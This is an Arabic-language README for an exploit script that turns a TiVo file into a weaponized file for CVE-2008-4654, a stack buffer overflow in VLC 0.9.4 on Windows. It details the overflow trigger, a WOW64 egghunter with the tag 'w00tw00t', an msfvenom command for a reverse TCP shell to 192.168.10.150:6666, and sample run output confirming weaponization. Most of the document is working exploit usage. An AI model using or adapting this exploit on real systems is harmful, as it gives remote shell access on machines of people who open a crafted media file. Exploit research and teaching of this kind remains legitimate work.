
استغلال كامل الوظائف لثغرة تجاوز سعة المخزن المؤقت المستند إلى المكدس في مشغل الوسائط VLC من VideoLan الإصدار 0.9.4 عند معالجة ملفات TiVo.
استغلال كامل الوظائف لثغرة تجاوز سعة المخزن المؤقت القائمة على المكدس CVE-2008-4654 في مشغل الوسائط VLC Media Player الإصدار 0.9.4 من VideoLan عند معالجة ملفات TiVo. يستهدف هذا الاستغلال برنامجًا 32-بت يعمل على نظام ويندوز 64-بت، ويستخدم egghunter من نوع WOW64 لتجاوز مساحة المكدس المحدودة.
حدّث السكربت:
buf = b'[...]' في السكربت بكود الشيل الخاص بك (مثلًا من msfvenom).EGG_HUNTER_WOW64 إذا أردت وسمًا مختلفًا أو كان لديك egghunter مخصص.python .\CVE-2008-4654.py --help
CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
usage: CVE-2008-4654.py [-h] --input INPUT --output OUTPUT
Transform a given TiVo file into a weapon with predefined shellcode.
options:
-h, --help show this help message and exit
--input INPUT Path to the input TiVo file to be weaponized.
--output OUTPUT Path where the modified (weaponized) TiVo file will be saved.
TIVO_PES_FILEID) في ملف TiVo.b"\x00\x00\x00\xff"، مما يهيئ قراءة خارج الحدود تؤدي إلى تجاوز سعة المكدس.TIVO_PES_FILEID) بحمولة مخصصة.w00tw00t.msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.150 LPORT=6666 -a x86 -f python -b '\x00'
buf = b'[...]' بكود الشيل الذي أنشأته سابقًا.PS C:\ > python .\CVE-2008-4654.py --input .\test.ty --output .\hazard.ty
CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
[+] Found TIVO_PES_FILEID at offset 0x300000.
[+] Replaced 4 bytes at offset 0x300014 with 0x000000ff.
[+] Replaced 685 bytes at offset 0x30005c.
[+] Successfully weaponized: .\hazard.ty